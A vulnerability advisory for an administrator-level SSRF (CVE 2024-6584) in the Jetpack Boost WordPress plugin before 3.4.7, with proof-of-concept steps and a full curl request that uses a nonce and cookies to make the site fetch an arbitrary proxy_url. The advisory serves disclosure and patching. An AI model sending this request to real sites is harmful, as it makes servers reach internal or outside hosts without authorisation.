Jetpack Boost < 3.4.7 – Admin+ SSRF | CVE 2024-6584

Description

The 'wp_ajax_boost_proxy_ig' action allows administrators to make GET requests to arbitrary URLs.

Proof of Concept

- Install and enable Jetpack Boost on a test site
- On the settings page enable the Image Guide functionality
- Browse to the site while logged in and grab the value of the image guide proxy nonce through the jbImageGuide.proxyNonce javascript variable.
- Make a curl request with your authenticated cookies:

curl -X POST 'https://TESTSITE/wp-admin/admin-ajax.php' \
  -H 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H 'accept-language: en-US,en;q=0.9' \
  -H 'cache-control: max-age=0' \
  -H 'cookie: YOUR_AUTH_COOKIES' \
  -H 'priority: u=0, i' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  -H 'sec-fetch-dest: document' \
  -H 'sec-fetch-mode: navigate' \
  -H 'sec-fetch-site: same-origin' \
  -H 'sec-fetch-user: ?1' \
  -H 'upgrade-insecure-requests: 1' \
  -H 'user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -d "action=boost_proxy_ig&nonce=NONCE_VALUE&proxy_url=URL_THAT_WILL_RECEIVE_REQUEST"